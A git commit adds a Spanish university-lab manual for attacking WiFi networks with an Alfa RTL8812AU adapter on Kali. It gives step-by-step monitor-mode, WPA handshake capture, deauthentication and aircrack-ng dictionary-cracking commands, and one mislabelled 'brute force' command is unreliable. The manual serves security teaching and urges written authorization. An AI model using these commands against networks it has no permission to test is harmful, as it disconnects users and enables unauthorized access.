08-ago: [discovery] Lecciones USB Linux ext4 + Realtek 8812AU + scripts kali-todo

This commit is contained in:
minguezsanzjuanjose
2026-08-08 17:44:16 +01:00
parent 35264ac8e5
commit cec31d9bc6
11 changed files with 1636 additions and 5 deletions

View File

@@ -0,0 +1,305 @@
# MANUAL PENTESTING WiFi — Alpha AWUS036ACH
**Chipset:** RTL8812AU | Dual-band 2.4/5GHz
**Entorno:** Laboratorio universitario con Live Boot USB Kali Linux
---
## PARTE 1: INSTALAR DRIVER EN WINDOWS
### Paso 1: Descargar driver
Ve a https://docs.alfa.com.tw/Product/AWUS036ACH/
Descarga el driver Windows (RTL8812AU).
### Paso 2: Instalar
1. Desconecta la antena
2. Ejecuta el instalador como administrador
3. Reinicia el PC
4. Conecta la antena después de reiniciar
### Paso 3: Verificar
Abre PowerShell y ejecuta:
```
Get-NetAdapter
```
Deberías ver la interfaz "Realtek 8812AU" con estado "Up".
> En Windows solo puedes escanar redes con Acrylic WiFi Free.
> Para pentesting REAL necesitas Kali Linux (Parte 2).
---
## PARTE 2: CREAR USB BOOTABLE DE KALI LINUX (CON PERSISTENCIA)
### Paso 1: Descargar Kali
Ve a https://www.kali.org/get-kali/
Descarga "Kali Linux 2026.x Installer" (ISO, ~4GB)
### Paso 2: Grabar ISO en USB con Rufus
**Necesitas:** USB de 16GB mínimo + Rufus
1. Descarga Rufus desde https://rufus.ie/
2. Inserta el USB
3. Abre Rufus
4. **Device** = tu USB
5. **Boot selection** = selecciona el ISO de Kali
6. **Partition scheme** = MBR
7. **Target system** = BIOS o UEFI
8. **Persistent storage** → mueve la barra a **8-12 GB**
⚠️ ESTO ES LO QUE CREA LA PARTICIÓN PERSISTENTE
Si no la mueves, TODO se pierde al apagar
9. Haz clic en **START**
10. Selecciona **"Write in DD mode"** cuando pregunte
11. Espera a que termine (~10-15 min)
---
## PARTE 3: ARRANCAR KALI DESDE USB
### Paso 1: Configurar BIOS para arrancar desde USB
1. Reinicia el PC
2. Pulsa **F2, F12 o DEL** al encender (depende del PC)
3. En BIOS ve a "Boot" o "Boot Order"
4. Pon **"USB-HDD"** o **"Removable Device"** como primera opción
5. Guarda y sal (**F10** normalmente)
### Paso 2: Arrancar Kali
1. En el menú de GRUB selecciona **"Live system (amd64)"**
2. Usuario: `kali` / Contraseña: `kali`
### Paso 3: Conectar la antena Alpha
1. Conecta la Alpha por USB **DESPUÉS** de arrancar Kali
2. Abre terminal y verifica:
```bash
lsusb
# Debe aparecer: Realtek Semiconductor Corp. RTL8812AU
```
```bash
iwconfig
# Debe aparecer: wlan0 o wlan1
```
**Si NO aparece wlan0**, instala el driver:
```bash
sudo apt update
sudo apt install -y realtek-rtl88xxau-dkms
sudo reboot
```
---
## PARTE 4: ACTIVAR MODO MONITOR
El modo monitor permite escuchar TODO el tráfico WiFi sin estar conectado a ninguna red. Es la base del pentesting.
```bash
# 1. Matar procesos que interfieran
sudo airmon-ng check kill
# 2. Activar modo monitor
sudo airmon-ng start wlan0
# 3. Verificar que está en modo monitor
iwconfig wlan0mon
# Debe decir: "Mode: Monitor"
```
> Si en vez de `wlan0mon` aparece `wlan0` en modo monitor,
> usa `wlan0` en todos los comandos siguientes.
**SALIR del modo monitor cuando termines:**
```bash
sudo airmon-ng stop wlan0mon
```
---
## PARTE 5: ESCANEAR REDES WiFi
Este es el paso más importante. Aquí ves TODAS las redes a tu alrededor.
```bash
sudo airodump-ng wlan0mon
```
### Columnas de la tabla:
| Columna | Significado |
|---------|-------------|
| **BSSID** | MAC del punto de acceso (router) |
| **PWR** | Potencia de señal (-30=excelente, -90=malo) |
| **Beacons** | Paquetes beacon recibidos |
| **#Data** | Paquetes de datos capturados |
| **CH** | Canal (1-13 en 2.4GHz, 36-165 en 5GHz) |
| **ENC** | Cifrado (WPA2, WPA3, OPN=abierto) |
| **ESSID** | Nombre de la red WiFi |
**PARA PARAR:** pulsa `Ctrl+C`
### Consejos para elegir red objetivo:
- **PWR entre -30 y -60** = buena señal (lo ideal)
- **#Data alto** = hay tráfico (clientes activos)
- **ENC = WPA2** (el más común, se puede crackear)
- Evita OPN (abierto) y WPA3 (muy difícil)
---
## PARTE 6: CAPTURAR HANDSHAKE DE UNA RED
Una vez elegida tu red objetivo (por ejemplo "CampusLab" canal 6, BSSID AA:BB:CC:DD:EE:FF):
**Abre UNA NUEVA terminal** (no cierres la de escaneo) y ejecuta:
```bash
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
```
**REEMPLAZA:**
- `6` → el canal de tu red objetivo
- `AA:BB:CC:DD:EE:FF` → el BSSID de tu red
- `captura` → nombre del archivo de salida
### Esto hace:
1. Escucha SOLO esa red en su canal
2. Guarda todo en archivos: `captura-01.cap`, `captura-01.csv`
3. Espera a que aparezca un **"WPA handshake"**
El WPA handshake aparece arriba a la derecha:
```
WPA handshake: AA:BB:CC:DD:EE:FF
```
**ESTO ES LO QUE NECESITAS** para crackear la contraseña.
Si no aparece el handshake, necesitas un cliente conectándose → Parte 7.
---
## PARTE 7: ATAQUE DE DEAUTH (FORZAR HANDSHAKE)
Si el handshake no aparece solo, puedes **FORZAR** a un cliente a reconectarse. Le desconecta momentáneamente y al reconectarse se captura el handshake.
**ABRE UNA TERCERA terminal** y ejecuta:
```bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c XX:XX:XX:XX:XX:XX wlan0mon
```
**REEMPLAZA:**
- `5` → número de paquetes de deauth (5-10 suele bastar)
- `AA:BB:CC:DD:EE:FF` → BSSID del router (igual que antes)
- `XX:XX:XX:XX:XX:XX` → MAC del cliente conectado
### Para ver clientes conectados:
Mira la terminal de la Parte 6. Bajo la columna **"STATION"** verás las MAC de los clientes.
Si no sabes la MAC del cliente, puedes omitir `-c`:
```bash
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
```
Esto envía deauth a **TODOS** los clientes de esa red.
**VERIFICA** que aparezca `"WPA handshake"` en la terminal de la Parte 6 después del ataque.
---
## PARTE 8: CRACKEAR LA CONTRASEÑA
Una vez tengas el WPA handshake capturado:
### Paso 1: Descomprimir el diccionario
```bash
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
```
### Paso 2: Ejecutar aircrack-ng
```bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
```
Sustituye `captura-01.cap` por el nombre de tu archivo.
Esto prueba **TODAS** las contraseñas del diccionario contra el handshake capturado.
Velocidad: ~1000-5000 claves/segundo.
### Si la contraseña está en el diccionario:
```
KEY FOUND! [ la_contraseña ]
```
### Si no está en el diccionario:
- Prueba con otro diccionario más grande
- O usa fuerza bruta (mucho más lento):
```bash
aircrack-ng -a 2 -b AA:BB:CC:DD:EE:FF -w /usr/share/wordlists/rockyou.txt captura-01.cap
```
---
## PARTE 9: PERSISTENCIA DEL USB (GUARDAR RESULTADOS)
Si usas Kali Live, al reiniciar **TODO se pierde** a menos que tengas persistencia.
### Opción A — Rufus Persistent Partition (ya lo hiciste en Parte 2)
Si activaste "Persistent storage" en Rufus, los archivos en `/home/kali` se guardan automáticamente entre reinicios.
### Opción B — Montar la partición persistente manualmente
```bash
# Identificar la partición
lsblk
# Busca la partición más grande del USB (sdb3 normalmente)
# Montar
sudo mkdir -p /mnt/persistence
sudo mount /dev/sdb3 /mnt/persistence
# Copiar resultados
cp captura-01.cap /mnt/persistence/
echo "RED: CampusLab | PASS: la_contraseña" > /mnt/persistence/wifi_cracked.txt
# Desmontar
sudo umount /mnt/persistence
```
### Opción C — Segundo USB o red
```bash
# A tu propio USB
cp captura-01.cap /media/kali/MI_USB/
# O subir a un servidor
scp captura-01.cap user@ip_servidor:/ruta/
```
---
## PARTE 10: GUARDAR LA CONTRASEÑA
```bash
echo "RED: CampusLab | PASS: la_contraseña" >> ~/wifi_cracked.txt
cat ~/wifi_cracked.txt
```
---
## PARTE 11: RESUMEN DE COMANDOS RÁPIDOS
| Paso | Comando |
|------|---------|
| Ver antena | `lsusb && iwconfig` |
| Matar interferencias | `sudo airmon-ng check kill` |
| Activar monitor | `sudo airmon-ng start wlan0` |
| Escanear redes | `sudo airodump-ng wlan0mon` |
| Capturar 1 red | `sudo airodump-ng -c CH --bssid MAC -w file wlan0mon` |
| Deauth 1 cliente | `sudo aireplay-ng --deauth 5 -a MAC_AP -c MAC_CLI wlan0mon` |
| Crackear | `aircrack-ng -w rockyou.txt file.cap` |
| Salir monitor | `sudo airmon-ng stop wlan0mon` |
---
## PARTE 12: TIPS PARA EL LABORATORIO UNIVERSITARIO
1. **Empieza solo con escaneo pasivo** (`airodump-ng`) — aprende a leer las redes antes de hacer nada activo
2. **Documenta** qué redes hay, en qué canales, qué cifrado usan
3. **Solo testea redes que tengas autorización explícita** — pide al profesor/encargado por escrito
4. **Practica primero con tu propio router** si puedes
5. El `rockyou.txt` viene en Kali en `/usr/share/wordlists/` (descomprimir con `sudo gunzip`)
6. **No hagas deauth en redes públicas reales** — es ilegal sin autorización
7. Si la señal es mala (PWR < -70), acércate al router o usa la antena con el reflector parabólico